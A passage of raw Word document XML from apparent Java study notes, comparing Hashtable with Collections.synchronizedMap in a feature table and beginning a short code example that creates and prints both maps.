          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB9B39E"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Suitable when </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read and write operations are minimal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>safety is a priority</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322C81BA" w14:textId="77777777" w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w:rsidRDefault="00D34DD9" w:rsidP="00D34DD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34DD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications to avoid performance bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE73570" w14:textId="77777777" w:rsidR="00EE66E8" w:rsidRPr="004F2440" w:rsidRDefault="00EE66E8" w:rsidP="00EE66E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="53D7F731">
          <v:rect id="_x0000_i3938" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA6AE9"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89" w:name="_Toc197867403"/>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HashTable and SynchronizedHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
    </w:p>
    <w:p w14:paraId="55E27718" w14:textId="287E704C" w:rsidR="005E15D1" w:rsidRPr="005E15D1" w:rsidRDefault="005E15D1" w:rsidP="00FB5053">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Difference between HashTable and Synchronized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3867"/>
        <w:gridCol w:w="4260"/>
      </w:tblGrid>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="77A7D665" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BFFC4EF"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E32F045"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13387331"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5291AB8" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CD8D85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Thread Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25F0D1A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Thread-safe (synchronized methods)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22A8EA1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Thread-safe (using Collections.synchronizedMap() wrapper)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="7B214D04" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54F2DEA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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0455B14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lower (locks the entire map for every operation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="667D974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lightly better (still locks entire map but more flexible)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="115ADCA8" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="479484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Null Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27AEA11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Does </w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>not allow</w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> null keys or values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7166D73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Allows </w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>one null key</w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>multiple null values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="2D402014" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65CFC8C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ation Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F55AF5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ation is built into each method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45356A6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ynchronization achieved via </w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>wrapper</w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> around HashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="44A92349" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="101B624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Legacy or Modern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="059519E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egacy (part of the </w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java 1.0</w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> API)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4410696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Modern approach (part of </w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java Collections Framework</w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="19636C14" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27BB733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terator Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D3F308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Fail-fast (throws ConcurrentModificationException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C35DCC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Fail-fast (same as HashMap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="78AA837C" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1635EE1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Recommended Alternative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DFAE1D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better concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CB78D0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Prefer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high-concurrency scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="57092477" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4083177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mplementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="002928E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Directly synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4612B72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w:t>
            </w:r>
            <w:r w:rsidRPr="005E15D1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Collections.synchronizedMap(new HashMap&lt;&gt;())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="36CA1A59" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14C8D48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Memory Consumption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="778E1D1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igher due to legacy implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21FE608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Lower compared to HashTable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0261931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pict w14:anchorId="793C9F16">
          <v:rect id="_x0000_i7279" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74557DA6"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1. Internal Working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC23967"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p w14:paraId="4C20E4C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w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized methods</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for all operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F5A79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for each read/write operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2C45D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Introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, before the Collections framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60813DF2"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p w14:paraId="5932671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Uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wrapper around HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAAF3E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Map&lt;String, String&gt; syncMap = Collections.synchronizedMap(new HashMap&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C482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ynchronization is applied to </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>each method</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> via the </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4949BD0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Introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as part of the Collections framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE6088B"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pict w14:anchorId="25B008AD">
          <v:rect id="_x0000_i7280" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE28328"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2. Code Example: HashTable vs SynchronizedHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE540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import java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A3064" w14:textId="77777777" w:rsidR="005E15D1" w:rsidRPr="005E15D1" w:rsidRDefault="005E15D1" w:rsidP="005E15D1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9F277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public class HashTableVsSynchronizedMap {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B9265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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FFCC7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reating a Hashtable (Legacy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6453BF4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Map&lt;String, Integer&gt; hashTable = new Hashtable&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDEF78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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        hashTable.put("Java", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CA572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hashTable.put("Python", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F131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HashTable: " + hashTable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D4176" w14:textId="77777777" w:rsidR="005E15D1" w:rsidRPr="005E15D1" w:rsidRDefault="005E15D1" w:rsidP="005E15D1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7995248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reating a SynchronizedMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A6647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Map&lt;String, Integer&gt; syncMap = Collections.synchronizedMap(new HashMap&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6A2AE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Java", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FC1CA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Python", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E3485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 + syncMap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5B3B7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6905733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Demonstrating null values</w:t>
      </w:r>
    </w:p>
